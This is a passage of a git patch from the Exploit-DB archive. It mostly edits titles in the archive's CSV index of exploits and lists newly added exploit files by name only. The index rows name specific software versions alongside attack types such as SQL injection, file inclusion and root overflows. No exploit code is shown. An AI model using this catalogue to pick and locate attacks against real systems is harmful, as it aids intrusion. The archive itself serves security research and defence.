From a447a01cb8fe45bb1491e57d47bcac6a9276bdce Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 20 May 2016 06:50:49 +0000 Subject: [PATCH] DB: 2016-05-20 --- files.csv | 2405 ++++++++++++++++--------------- platforms/linux/dos/39842.txt | 140 ++ platforms/osx/dos/39839.txt | 68 + platforms/php/webapps/12387.sh | 2 +- platforms/php/webapps/12643.pl | 2 +- platforms/php/webapps/17613.php | 5 +- platforms/php/webapps/2087.php | 1 - platforms/php/webapps/28863.txt | 2 - platforms/php/webapps/29676.txt | 2 - platforms/php/webapps/29677.txt | 2 - platforms/php/webapps/29678.txt | 2 - platforms/php/webapps/4125.txt | 2 +- platforms/php/webapps/4329.txt | 2 - platforms/php/webapps/4342.txt | 2 - platforms/php/webapps/4378.htm | 2 +- platforms/php/webapps/4443.txt | 2 - platforms/php/webapps/4449.txt | 2 - platforms/php/webapps/4817.txt | 2 - platforms/php/webapps/7780.pl | 2 +- platforms/php/webapps/9407.txt | 2 - platforms/php/webapps/9425.sh | 2 +- platforms/windows/local/39843.c | 197 +++ platforms/xml/webapps/39840.txt | 168 +++ platforms/xml/webapps/39841.txt | 159 ++ 24 files changed, 1944 insertions(+), 1231 deletions(-) create mode 100755 platforms/linux/dos/39842.txt create mode 100755 platforms/osx/dos/39839.txt create mode 100755 platforms/windows/local/39843.c create mode 100755 platforms/xml/webapps/39840.txt create mode 100755 platforms/xml/webapps/39841.txt diff --git a/files.csv b/files.csv index db035f2d5..05ff95192 100755 --- a/files.csv +++ b/files.csv @@ -175,7 +175,7 @@ id,file,description,date,author,platform,type,port 179,platforms/cgi/webapps/179.c,"News Update 1.1 Change Admin Password",2000-11-15,morpheus[bd],cgi,webapps,0 180,platforms/linux/local/180.c,"GnomeHack 1.0.5 - Local Buffer Overflow Exploit",2000-11-15,vade79,linux,local,0 181,platforms/linux/remote/181.c,"Half Life (rcon) Remote Buffer Overflow Exploit",2000-11-16,"Sao Paulo",linux,remote,27015 -182,platforms/linux/local/182.sh,"/sbin/restore Exploit (rh6.2)",2000-11-16,N/A,linux,local,0 +182,platforms/linux/local/182.sh,"Redhat 6.2 /sbin/restore - Exploit",2000-11-16,N/A,linux,local,0 183,platforms/linux/local/183.c,"Oracle (oidldapd connect) Local Command Line Overflow Exploit",2000-11-16,N/A,linux,local,0 184,platforms/linux/local/184.pl,"Restore and Dump Local Exploit",2000-11-16,Tlabs,linux,local,0 185,platforms/linux/dos/185.sh,"Slackware Linux - /usr/bin/ppp-off Insecure /tmp Call Exploit",2000-11-17,sinfony,linux,dos,0 @@ -195,7 +195,7 @@ id,file,description,date,author,platform,type,port 202,platforms/bsd/local/202.c,"BSDi 3.0 / 4.0 - rcvtty[mh] Local Exploit",2000-11-21,vade79,bsd,local,0 203,platforms/linux/local/203.sh,"vixie-cron - Local Root Exploit",2000-11-21,"Michal Zalewski",linux,local,0 204,platforms/linux/remote/204.c,"BFTPd vsprintf() Format Strings Exploit",2000-11-29,DiGiT,linux,remote,21 -205,platforms/linux/local/205.pl,"(redhat 6.2) /usr/bin/rcp suid - Privledge Exploit",2000-11-29,Tlabs,linux,local,0 +205,platforms/linux/local/205.pl,"Redhat 6.2 /usr/bin/rcp suid - Privledge Exploit",2000-11-29,Tlabs,linux,local,0 206,platforms/linux/local/206.c,"dump 0.4b15 Exploit (Redhat 6.2)",2000-11-29,mat,linux,local,0 207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Local Root Buffer Overflow Exploit",2000-11-30,vade79,bsd,local,0 208,platforms/linux/remote/208.c,"INND/NNRP < 1.6.x - Remote Root Overflow Exploit",2000-11-30,"Babcia Padlina",linux,remote,119 @@ -244,7 +244,7 @@ id,file,description,date,author,platform,type,port 255,platforms/linux/local/255.pl,"Redhat 6.1 man - Local Exploit (egid 15)",2001-01-19,teleh0r,linux,local,0 256,platforms/solaris/local/256.c,"Solaris 2.6 / 2.7 /usr/bin/write Local Overflow Exploit",2001-01-25,"Pablo Sor",solaris,local,0 257,platforms/linux/local/257.pl,"jaZip 0.32-2 - Local Buffer Overflow Exploit",2001-01-25,teleh0r,linux,local,0 -258,platforms/linux/local/258.sh,"glibc-2.2 and openssh-2.3.0p1 Exploits glibc <= 2.1.9x",2001-01-25,krochos,linux,local,0 +258,platforms/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc <= 2.1.9x - Exploits",2001-01-25,krochos,linux,local,0 259,platforms/tru64/local/259.c,"Tru64 5 (su) Env Local Stack Overflow Exploit",2001-01-26,K2,tru64,local,0 260,platforms/linux/local/260.c,"splitvt < 1.6.5 - Local Exploit",2001-01-26,"Michel Kaempf",linux,local,0 261,platforms/sco/local/261.c,"SCO OpenServer 5.0.5 Env Local Stack Overflow Exploit",2001-01-26,K2,sco,local,0 @@ -306,7 +306,7 @@ id,file,description,date,author,platform,type,port 325,platforms/linux/local/325.c,"BSD & Linux - lpr Command Local Root Exploit",1996-10-25,"Vadim Kolontsov",linux,local,0 328,platforms/solaris/local/328.c,"Solaris 2.4 /bin/fdformat Local Buffer Overflow Exploits",1997-03-23,"Cristian Schipor",solaris,local,0 329,platforms/windows/dos/329.txt,"Microsoft Windows NT Crash with an Extra Long Username DoS Exploit",1997-04-01,Fyodor,windows,dos,0 -330,platforms/solaris/local/330.sh,"Solaris 2.5.1 lp and lpsched Symlink Vulnerabilities",1997-05-03,"Chris Sheldon",solaris,local,0 +330,platforms/solaris/local/330.sh,"Solaris 2.5.1 lp and lpsched - Symlink Vulnerabilities",1997-05-03,"Chris Sheldon",solaris,local,0 331,platforms/linux/local/331.c,"LibXt XtAppInitialize() Overflow *xterm Exploit",1997-05-14,"Ming Zhang",linux,local,0 332,platforms/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps & chkey Data Buffer Exploit",1997-05-19,"Joe Zbiciak",solaris,local,0 333,platforms/aix/local/333.c,"AIX 4.2 /usr/dt/bin/dtterm Local Buffer Overflow Exploit",1997-05-27,"Georgi Guninski",aix,local,0 @@ -471,7 +471,7 @@ id,file,description,date,author,platform,type,port 607,platforms/windows/dos/607.c,"Flash Messaging <= 5.2.0g - Remote Denial of Service Exploit",2004-03-02,"Luigi Auriemma",windows,dos,0 608,platforms/linux/remote/608.c,"WvTFTPd 0.9 - Remote Root Heap Overflow Exploit",2004-10-28,infamous41md,linux,remote,69 609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Execution PoC Exploits",2004-10-28,infamous41md,linux,remote,0 -611,platforms/windows/dos/611.c,"chesapeake tftp server 1.0 - Directory Traversal and DoS PoC Exploit",2004-11-01,"Luigi Auriemma",windows,dos,0 +611,platforms/windows/dos/611.c,"chesapeake tftp server 1.0 - Directory Traversal / DoS PoC Exploit",2004-11-01,"Luigi Auriemma",windows,dos,0 612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - (IFRAME Tag) Buffer Overflow Exploit",2004-11-02,Skylined,windows,remote,0 616,platforms/windows/remote/616.c,"MiniShare <= 1.4.1 - Remote Buffer Overflow Exploit",2004-11-07,class101,windows,remote,80 618,platforms/windows/remote/618.c,"Ability Server 2.34 - FTP STOR Buffer Overflow Exploit (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21 @@ -486,7 +486,7 @@ id,file,description,date,author,platform,type,port 628,platforms/windows/dos/628.c,"NetNote Server <= 2.2 build 230 - Crafted String DoS Exploit",2004-11-13,class101,windows,dos,0 629,platforms/multiple/local/629.c,"Multiple AntiVirus (zip file) Detection Bypass Exploit",2004-11-14,oc192,multiple,local,0 630,platforms/php/webapps/630.pl,"UBB.threads 6.2.x - 6.3x - One Char Bruteforce Exploit",2004-11-15,RusH,php,webapps,0 -631,platforms/php/webapps/631.txt,"vBulletin LAST.PHP SQL Injection Vulnerability",2004-11-15,N/A,php,webapps,0 +631,platforms/php/webapps/631.txt,"vBulletin LAST.php SQL Injection Vulnerability",2004-11-15,N/A,php,webapps,0 634,platforms/windows/dos/634.pl,"Secure Network Messenger <= 1.4.2 - Denial of Service Exploit",2004-11-15,ClearScreen,windows,dos,0 635,platforms/php/webapps/635.txt,"miniBB - Input Validation Hole ('user')",2004-11-16,N/A,php,webapps,0 636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,80 @@ -519,7 +519,7 @@ id,file,description,date,author,platform,type,port 669,platforms/linux/local/669.c,"Aspell (word-list-compress) Command Line Stack Overflow",2004-12-01,c0d3r,linux,local,0 670,platforms/windows/remote/670.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (2) (c code)",2004-12-01,JohnH,windows,remote,143 671,platforms/windows/dos/671.c,"Neverwinter Nights special Fake Players Denial of Service Exploit",2004-12-01,"Luigi Auriemma",windows,dos,0 -672,platforms/windows/dos/672.c,"Kreed <= 1.05 - Format String and Denial of Service Exploit",2004-12-02,"Luigi Auriemma",windows,dos,0 +672,platforms/windows/dos/672.c,"Kreed <= 1.05 - Format String / Denial of Service Exploit",2004-12-02,"Luigi Auriemma",windows,dos,0 673,platforms/php/webapps/673.cgi,"phpBB <= 2.0.10 - Remote Command Execution Exploit (CGI)",2004-12-03,ZzagorR,php,webapps,0 675,platforms/windows/remote/675.txt,"Hosting Controller <= 0.6.1 Hotfix 1.4 - Directory Browsing Vulnerability",2004-12-05,Mouse,windows,remote,0 676,platforms/php/webapps/676.c,"phpBB 1.0.0 & 2.0.10 - admin_cash.php Remote Exploit",2004-12-05,evilrabbi,php,webapps,0 @@ -600,7 +600,7 @@ id,file,description,date,author,platform,type,port 773,platforms/cgi/webapps/773.pl,"AWStats (6.0-6.2) configdir Remote Command Execution Exploit (perl code)",2005-01-25,GHC,cgi,webapps,0 774,platforms/php/webapps/774.pl,"Siteman <= 1.1.10 - Remote Administrative Account Addition Exploit",2005-01-25,"Noam Rathaus",php,webapps,0 775,platforms/linux/remote/775.c,"Berlios gpsd <= 2.7.x - Remote Format String Vulnerability",2005-01-26,JohnH,linux,remote,2947 -776,platforms/linux/local/776.c,"/usr/bin/trn Local Exploit (not suid)",2005-01-26,ZzagorR,linux,local,0 +776,platforms/linux/local/776.c,"/usr/bin/trn - Local Exploit (not suid)",2005-01-26,ZzagorR,linux,local,0 778,platforms/linux/local/778.c,"Linux Kernel 2.4 - uselib() Privilege Elevation Exploit",2005-01-27,"Tim Hsu",linux,local,0 779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0 780,platforms/windows/dos/780.c,"Xpand Rally <= 1.0.0.0 (Server/Clients) - Crash Exploit",2005-01-31,"Luigi Auriemma",windows,dos,28015 @@ -617,7 +617,7 @@ id,file,description,date,author,platform,type,port 791,platforms/linux/local/791.c,"Setuid perl PerlIO_Debug() Overflow",2005-02-07,"Kevin Finisterre",linux,local,0 792,platforms/linux/local/792.c,"Setuid perl PerlIO_Debug() Root owned file creation",2005-02-07,"Kevin Finisterre",linux,local,0 793,platforms/osx/local/793.pl,"Mac OS X DS_Store Arbitrary File Overwrite Exploit",2005-02-07,vade79,osx,local,0 -794,platforms/windows/remote/794.c,"3CServer 1.1 FTP Server Remote Exploit",2005-02-07,mandragore,windows,remote,21 +794,platforms/windows/remote/794.c,"3CServer 1.1 - FTP Server Remote Exploit",2005-02-07,mandragore,windows,remote,21 795,platforms/osx/local/795.pl,"Mac OS X Adobe Version Cue - Local Root Exploit",2005-02-07,0xdeadbabe,osx,local,0 796,platforms/linux/local/796.sh,"Exim <= 4.42 - Local Root Exploit",2005-02-07,darkeagle,linux,local,0 797,platforms/windows/dos/797.py,"Foxmail 2.0 (MAIL FROM:) Denial of Service Exploit",2005-02-07,OYXin,windows,dos,0 @@ -647,7 +647,7 @@ id,file,description,date,author,platform,type,port 822,platforms/windows/remote/822.c,"Serv-U 4.x - 'site chmod' Remote Buffer Overflow Exploit",2004-01-30,Skylined,windows,remote,21 823,platforms/windows/remote/823.c,"BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Exploit",2004-02-11,Skylined,windows,remote,21 824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid) (updated)",2005-09-13,Qnix,linux,local,0 -825,platforms/windows/remote/825.c,"3Com Ftp Server 2.0 - Remote Overflow Exploit",2005-02-17,c0d3r,windows,remote,21 +825,platforms/windows/remote/825.c,"3Com FTP Server 2.0 - Remote Overflow Exploit",2005-02-17,c0d3r,windows,remote,21 826,platforms/linux/remote/826.c,"Medal of Honor Spearhead Server Remote Buffer Overflow (Linux)",2005-02-18,millhouse,linux,remote,12203 827,platforms/windows/remote/827.c,"3Com 3CDaemon FTP - Unauthorized 'USER' Remote BoF Exploit",2005-02-18,class101,windows,remote,21 828,platforms/multiple/remote/828.c,"Knox Arkeia Server Backup 5.3.x - Remote Root Exploit",2005-02-18,"John Doe",multiple,remote,617 @@ -741,7 +741,7 @@ id,file,description,date,author,platform,type,port 920,platforms/windows/local/920.c,"P2P Share Spy 2.2 - Local Password Disclosure Exploit",2005-04-07,Kozan,windows,local,0 921,platforms/php/webapps/921.sh,"PHP-Nuke 6.x - 7.6 Top module - Remote SQL Injection Exploit",2005-04-07,"Fabrizi Andrea",php,webapps,0 922,platforms/cgi/webapps/922.pl,"The Includer CGI <= 1.0 - Remote Command Execution (1)",2005-04-08,GreenwooD,cgi,webapps,0 -30090,platforms/php/webapps/30090.txt,"phpPgAdmin <= 4.1.1 Redirect.PHP Cross-Site Scripting Vulnerability",2007-05-25,"Michal Majchrowicz",php,webapps,0 +30090,platforms/php/webapps/30090.txt,"phpPgAdmin <= 4.1.1 Redirect.php Cross-Site Scripting Vulnerability",2007-05-25,"Michal Majchrowicz",php,webapps,0 923,platforms/cgi/webapps/923.pl,"The Includer CGI <= 1.0 - Remote Command Execution (2)",2005-04-08,K-C0d3r,cgi,webapps,0 924,platforms/linux/local/924.c,"sash <= 3.7 - Local Buffer Overflow Exploit",2005-04-08,lammat,linux,local,0 925,platforms/asp/webapps/925.txt,"ACNews <= 1.0 Admin Authentication Bypass SQL Injection Exploit",2005-04-09,LaMeR,asp,webapps,0 @@ -823,8 +823,8 @@ id,file,description,date,author,platform,type,port 1010,platforms/asp/webapps/1010.pl,"Maxwebportal <= 1.36 password.asp Change Password Exploit (3 - perl)",2005-05-26,Alpha_Programmer,asp,webapps,0 1011,platforms/asp/webapps/1011.php,"Maxwebportal <= 1.36 password.asp Change Password Exploit (2 - php)",2005-05-26,mh_p0rtal,asp,webapps,0 1012,platforms/asp/webapps/1012.txt,"Maxwebportal <= 1.36 password.asp Change Password Exploit (1 - html)",2005-05-26,"Soroush Dalili",asp,webapps,0 -1013,platforms/php/webapps/1013.pl,"Invision Power Board <= 2.0.3 - Login.PHP SQL Injection Exploit",2005-05-26,"Petey Beege",php,webapps,0 -1014,platforms/php/webapps/1014.txt,"Invision Power Board <= 2.0.3 - Login.PHP SQL Injection (tutorial)",2005-05-27,"Danica Jones",php,webapps,0 +1013,platforms/php/webapps/1013.pl,"Invision Power Board <= 2.0.3 - Login.php SQL Injection Exploit",2005-05-26,"Petey Beege",php,webapps,0 +1014,platforms/php/webapps/1014.txt,"Invision Power Board <= 2.0.3 - Login.php SQL Injection (tutorial)",2005-05-27,"Danica Jones",php,webapps,0 1015,platforms/asp/webapps/1015.txt,"Hosting Controller <= 0.6.1 Unauthenticated User Registeration (3rd)",2005-05-27,"Soroush Dalili",asp,webapps,0 1016,platforms/php/webapps/1016.pl,"phpStat <= 1.5 - (setup.php) Authentication Bypass Exploit (Perl)",2005-05-30,Alpha_Programmer,php,webapps,0 1017,platforms/php/webapps/1017.php,"phpStat <= 1.5 - (setup.php) Authentication Bypass Exploit (PHP) (1)",2005-05-30,mh_p0rtal,php,webapps,0 @@ -846,7 +846,7 @@ id,file,description,date,author,platform,type,port 1033,platforms/php/webapps/1033.pl,"WordPress <= 1.5.1.1 - SQL Injection Exploit",2005-06-22,"Alberto Trivero",php,webapps,0 1034,platforms/windows/local/1034.cpp,"WinZIP <= 8.1 Command Line Local Buffer Overflow Exploit",2005-06-07,ATmaCA,windows,local,0 1035,platforms/windows/remote/1035.c,"IPSwitch IMAP Server LOGON Remote Stack Overflow",2005-06-07,nolimit,windows,remote,143 -1036,platforms/php/webapps/1036.php,"Invision Power Board <= 1.3.1 - Login.PHP SQL Injection",2005-06-08,N/A,php,webapps,0 +1036,platforms/php/webapps/1036.php,"Invision Power Board <= 1.3.1 - Login.php SQL Injection",2005-06-08,N/A,php,webapps,0 1037,platforms/multiple/dos/1037.c,"Tcpdump bgp_update_print Remote Denial of Service Exploit",2005-06-09,simon,multiple,dos,0 1038,platforms/linux/remote/1038.c,"GNU Mailutils imap4d 0.5 < 0.6.90 - Remote Format String Exploit",2005-06-10,qobaiashi,linux,remote,143 1039,platforms/cgi/webapps/1039.pl,"Webhints <= 1.03 - Remote Command Execution Exploit (perl code) (1)",2005-06-11,Alpha_Programmer,cgi,webapps,0 @@ -1274,7 +1274,7 @@ id,file,description,date,author,platform,type,port 1530,platforms/php/webapps/1530.pl,"SaphpLesson 2.0 (forumid) Remote SQL Injection Exploit",2006-02-25,SnIpEr_SA,php,webapps,0 1531,platforms/windows/dos/1531.pl,"ArGoSoft FTP Server <= 1.4.3.5 - Remote Buffer Overflow PoC",2006-02-25,"Jerome Athias",windows,dos,0 1532,platforms/php/webapps/1532.pl,"PwsPHP <= 1.2.3 (index.php) Remote SQL Injection Exploit",2006-02-25,papipsycho,php,webapps,0 -1533,platforms/php/webapps/1533.php,"4Images <= 1.7.1 (Local Inclusion) Remote Code Execution Exploit",2006-02-26,rgod,php,webapps,0 +1533,platforms/php/webapps/1533.php,"4Images <= 1.7.1 - (Local Inclusion) Remote Code Execution Exploit",2006-02-26,rgod,php,webapps,0 1534,platforms/sco/local/1534.c,"SCO Unixware 7.1.3 - (ptrace) Local Privilege Escalation Exploit",2006-02-26,prdelka,sco,local,0 1535,platforms/windows/dos/1535.c,"CrossFire <= 1.8.0 - (oldsocketmode) Remote Buffer Overflow PoC",2006-02-27,"Luigi Auriemma",windows,dos,0 1536,platforms/windows/remote/1536.pm,"Microsoft Internet Explorer 6.0 SP0 IsComponentInstalled() Remote Exploit",2006-02-28,"H D Moore",windows,remote,0 @@ -1785,7 +1785,7 @@ id,file,description,date,author,platform,type,port 2084,platforms/php/webapps/2084.txt,"Mambo MGM Component <= 0.95r2 - Remote Inclusion Vulnerability",2006-07-28,"A-S-T TEAM",php,webapps,0 2085,platforms/php/webapps/2085.txt,"Mambo Colophon Component <= 1.2 - Remote Inclusion Vulnerability",2006-07-29,Drago84,php,webapps,0 2086,platforms/php/webapps/2086.txt,"Mambo mambatStaff Component <= 3.1b Remote Inclusion Vulnerability",2006-07-29,Dr.Jr7,php,webapps,0 -2087,platforms/php/webapps/2087.php,"vbPortal 3.0.2 <= 3.6.0 b1 - (cookie) Remote Code Excution Exploit",2006-07-29,R00t[ATI],php,webapps,0 +2087,platforms/php/webapps/2087.php,"vbPortal 3.0.2 <= 3.6.0 b1 - (cookie) Remote Code Excution Exploit",2006-07-29,r00t,php,webapps,0 2088,platforms/php/webapps/2088.php,"ATutor <= 1.5.3.1 (links) Remote Blind SQL Injection Exploit",2006-07-30,rgod,php,webapps,0 2089,platforms/php/webapps/2089.txt,"Mambo User Home Pages Component <= 0.5 - Remote Include Vulnerability",2006-07-30,"Kurdish Security",php,webapps,0 2090,platforms/php/webapps/2090.txt,"Joomla com_bayesiannaivefilter Component <= 1.1 Inclusion Vulnerability",2006-07-30,Pablin77,php,webapps,0 @@ -1940,7 +1940,7 @@ id,file,description,date,author,platform,type,port 2243,platforms/php/webapps/2243.php,"Simple Machines Forum <= 1.1 rc2 Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0 2244,platforms/multiple/dos/2244.pl,"Mozilla Firefox <= 1.5.0.6 (FTP Request) Remote Denial of Service Exploit",2006-08-22,"Tomas Kempinsky",multiple,dos,0 2245,platforms/windows/dos/2245.pl,"MDaemon POP3 Server < 9.06 - (USER) Remote Buffer Overflow PoC",2006-08-22,"Leon Juranic",windows,dos,0 -2246,platforms/hardware/dos/2246.cpp,"2wire Modems/Routers CRLF - Denial of Service Exploit",2006-08-22,preth00nker,hardware,dos,0 +2246,platforms/hardware/dos/2246.cpp,"2Wire Modems/Routers CRLF - Denial of Service Exploit",2006-08-22,preth00nker,hardware,dos,0 2247,platforms/php/webapps/2247.php,"MercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit",2006-08-23,rgod,php,webapps,0 2248,platforms/php/webapps/2248.pl,"phpBB All Topics Mod <= 1.5.0 - (start) Remote SQL Injection Exploit",2006-08-23,SpiderZ,php,webapps,0 2249,platforms/php/webapps/2249.txt,"pSlash 0.7 (lvc_include_dir) Remote File Include Vulnerability",2006-08-23,"Mehmet Ince",php,webapps,0 @@ -2180,7 +2180,7 @@ id,file,description,date,author,platform,type,port 2484,platforms/php/webapps/2484.txt,"FreeForum <= 0.9.7 (forum.php) Remote File Include Vulnerability",2006-10-07,"Mehmet Ince",php,webapps,0 2485,platforms/php/webapps/2485.pl,"Cahier de texte 2.0 (lire.php) Remote SQL Injection Exploit",2006-10-07,s4mi,php,webapps,0 2486,platforms/php/webapps/2486.txt,"phpBB Random User Registration Number 1.0 Mod Inclusion Vulnerability",2006-10-07,bd0rk,php,webapps,0 -2487,platforms/php/webapps/2487.php,"4images 1.7.x - (search.php) Remote SQL Injection Exploit",2006-10-08,Synsta,php,webapps,0 +2487,platforms/php/webapps/2487.php,"4Images 1.7.x - (search.php) Remote SQL Injection Exploit",2006-10-08,Synsta,php,webapps,0 2488,platforms/php/webapps/2488.txt,"PHPMyNews <= 1.4 (cfg_include_dir) Remote File Include Vulnerabilities",2006-10-08,"Mehmet Ince",php,webapps,0 2489,platforms/php/webapps/2489.pl,"Ciamos CMS <= 0.9.6b (config.php) Remote File Include Exploit",2006-10-08,Kacper,php,webapps,0 2490,platforms/php/webapps/2490.txt,"Freenews <= 1.1 (moteur.php) Remote File Include Vulnerability",2006-10-08,"Mehmet Ince",php,webapps,0 @@ -2388,7 +2388,7 @@ id,file,description,date,author,platform,type,port 2695,platforms/multiple/dos/2695.html,"Mozilla Firefox <= 1.5.0.7/ 2.0 (createRange) Remote DoS Exploit",2006-10-31,"Gotfault Security",multiple,dos,0 2696,platforms/php/webapps/2696.php,"Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit",2006-11-01,Rapigator,php,webapps,0 2697,platforms/php/webapps/2697.php,"Innovate Portal <= 2.0 (acp.php) Remote Code Execution Exploit",2006-11-01,Kacper,php,webapps,0 -2698,platforms/php/webapps/2698.pl,"2BGal 3.0 (admin/configuration.inc.php) Local Inclusion Exploit",2006-11-01,Kw3[R]Ln,php,webapps,0 +2698,platforms/php/webapps/2698.pl,"2BGal 3.0 - (admin/configuration.inc.php) Local Inclusion Exploit",2006-11-01,Kw3[R]Ln,php,webapps,0 2699,platforms/windows/remote/2699.c,"EFS Easy Address Book Web Server <= 1.2 - Remote File Stream Exploit",2006-11-01,"Greg Linares",windows,remote,0 2700,platforms/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption Proof of Concept",2006-11-01,"H D Moore",hardware,dos,0 2701,platforms/php/webapps/2701.txt,"TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure Vulnerability",2006-11-01,securfrog,php,webapps,0 @@ -2655,7 +2655,7 @@ id,file,description,date,author,platform,type,port 2979,platforms/php/webapps/2979.txt,"KISGB <= 5.1.1 (authenticate.php) Remote File Include Vulnerability",2006-12-22,mdx,php,webapps,0 2980,platforms/php/webapps/2980.txt,"EternalMart Guestbook 1.10 - (admin/auth.php) Remote Inclusion Vulnerability",2006-12-22,mdx,php,webapps,0 2981,platforms/php/webapps/2981.php,"open newsletter <= 2.5 - Multiple Vulnerabilities (2)",2006-12-23,BlackHawk,php,webapps,0 -2982,platforms/php/webapps/2982.txt,"3editor CMS <= 0.42 (index.php) Local File Include Vulnerability",2006-12-22,3l3ctric-Cracker,php,webapps,0 +2982,platforms/php/webapps/2982.txt,"3editor CMS <= 0.42 - (index.php) Local File Include Vulnerability",2006-12-22,3l3ctric-Cracker,php,webapps,0 2983,platforms/php/webapps/2983.txt,"b2 Blog <= 0.5 (b2verifauth.php) Remote File Include Vulnerability",2006-12-23,mdx,php,webapps,0 2984,platforms/php/webapps/2984.txt,"SH-News 0.93 (misc.php) Remote File Include Exploit",2006-12-23,bd0rk,php,webapps,0 2985,platforms/windows/dos/2985.pl,"acFTP FTP Server 1.5 (REST/PBSZ) Remote Denial of Service Exploit",2006-12-23,gbr,windows,dos,0 @@ -3476,15 +3476,15 @@ id,file,description,date,author,platform,type,port 3818,platforms/php/webapps/3818.htm,"The Merchant <= 2.2.0 (index.php show) Remote File Inclusion Exploit",2007-04-29,kezzap66345,php,webapps,0 3819,platforms/windows/dos/3819.py,"RealPlayer 10 - (.ra) Remote Denial of Service Exploit",2007-04-30,n00b,windows,dos,0 3820,platforms/php/webapps/3820.php,"psipuss 1.0 (editusers.php) Remote Change Admin Password Exploit",2007-04-30,Dj7xpl,php,webapps,0 -3821,platforms/linux/remote/3821.c,"3proxy 0.5.3g proxy.c logurl() Remote Buffer Overflow Exploit (linux)",2007-04-30,vade79,linux,remote,0 -3822,platforms/windows/remote/3822.c,"3proxy 0.5.3g proxy.c logurl() Remote Buffer Overflow Exploit (Win32)",2007-04-30,vade79,windows,remote,0 +3821,platforms/linux/remote/3821.c,"3proxy 0.5.3g - proxy.c logurl() Remote Buffer Overflow Exploit (linux)",2007-04-30,vade79,linux,remote,0 +3822,platforms/windows/remote/3822.c,"3proxy 0.5.3g - proxy.c logurl() Remote Buffer Overflow Exploit (Win32)",2007-04-30,vade79,windows,remote,0 3823,platforms/windows/local/3823.c,"Winamp <= 5.34 - (.mp4) Code Execution Exploit",2007-04-30,Marsu,windows,local,0 -3824,platforms/php/webapps/3824.txt,"WordPress plugin wp-Table <= 1.43 - (inc_dir) RFI Vulnerability",2007-05-01,K-159,php,webapps,0 -3825,platforms/php/webapps/3825.txt,"WordPress plugin wordTube <= 1.43 - (wpPATH) RFI Vulnerability",2007-05-01,K-159,php,webapps,0 +3824,platforms/php/webapps/3824.txt,"WordPress Plugin wp-Table <= 1.43 - (inc_dir) RFI Vulnerability",2007-05-01,K-159,php,webapps,0 +3825,platforms/php/webapps/3825.txt,"WordPress Plugin wordTube <= 1.43 - (wpPATH) RFI Vulnerability",2007-05-01,K-159,php,webapps,0 3826,platforms/windows/dos/3826.html,"PowerPoint Viewer OCX 3.2 (ActiveX Control) Denial of Service Exploit",2007-05-01,shinnai,windows,dos,0 3827,platforms/php/webapps/3827.txt,"Sendcard <= 3.4.1 (sendcard.php form) Local File Inclusion Vulnerability",2007-05-01,ettee,php,webapps,0 -3828,platforms/php/webapps/3828.txt,"WordPress plugin myflash <= 1.00 - (wppath) RFI Vulnerability",2007-05-01,Crackers_Child,php,webapps,0 -3829,platforms/linux/remote/3829.c,"3proxy 0.5.3g proxy.c logurl() Remote Overflow Exploit (exec-shield)",2007-05-02,Xpl017Elz,linux,remote,0 +3828,platforms/php/webapps/3828.txt,"WordPress Plugin myflash <= 1.00 - (wppath) RFI Vulnerability",2007-05-01,Crackers_Child,php,webapps,0 +3829,platforms/linux/remote/3829.c,"3proxy 0.5.3g - proxy.c logurl() Remote Overflow Exploit (exec-shield)",2007-05-02,Xpl017Elz,linux,remote,0 3830,platforms/windows/dos/3830.html,"Excel Viewer OCX 3.1.0.6 - Multiple Methods Denial of Service Exploit",2007-05-02,shinnai,windows,dos,0 3831,platforms/asp/webapps/3831.txt,"PStruh-CZ 1.3/1.5 - (download.asp File) File Disclosure Vulnerability",2007-05-02,Dj7xpl,asp,webapps,0 3832,platforms/php/webapps/3832.txt,"1024 CMS 0.7 (download.php item) Remote File Disclosure Vulnerability",2007-05-02,Dj7xpl,php,webapps,0 @@ -3772,7 +3772,7 @@ id,file,description,date,author,platform,type,port 4122,platforms/php/webapps/4122.txt,"b1gbb 2.24.0 (SQL Injection / XSS) Remote Vulnerabilities",2007-06-28,GoLd_M,php,webapps,0 4123,platforms/windows/remote/4123.html,"AMX Corp. VNC ActiveX Control (AmxVnc.dll 1.0.13.0) BoF Exploit",2007-06-28,rgod,windows,remote,0 4124,platforms/php/webapps/4124.txt,"GL-SH Deaf Forum <= 6.4.4 - Local File Inclusion Vulnerabilities",2007-06-28,Katatafish,php,webapps,0 -4125,platforms/php/webapps/4125.txt,"WebChat 0.78 (login.php rid) Remote SQL Injection Vulnerability",2007-06-28,R00t[ATI],php,webapps,0 +4125,platforms/php/webapps/4125.txt,"WebChat 0.78 (login.php rid) Remote SQL Injection Vulnerability",2007-06-28,r00t,php,webapps,0 4126,platforms/windows/dos/4126.c,"W3Filer 2.1.3 - Remote Stack Overflow PoC",2007-06-29,r0ut3r,windows,dos,0 4127,platforms/php/webapps/4127.txt,"Buddy Zone 1.5 (view_sub_cat.php cat_id) SQL Injection Vulnerability",2007-06-29,t0pP8uZz,php,webapps,0 4128,platforms/php/webapps/4128.txt,"Buddy Zone <= 1.5 - Multiple SQL Injection Vulnerabilities",2007-06-30,t0pP8uZz,php,webapps,0 @@ -4397,7 +4397,7 @@ id,file,description,date,author,platform,type,port 4750,platforms/php/webapps/4750.txt,"phpMyRealty 1.0.x - (search.php type) Remote SQL Injection Vulnerability",2007-12-18,Koller,php,webapps,0 4751,platforms/windows/local/4751.pl,"jetAudio 7.0.5 COWON Media Center MP4 - Stack Overflow Exploit",2007-12-18,"SYS 49152",windows,local,0 4753,platforms/php/webapps/4753.txt,"Dokeos 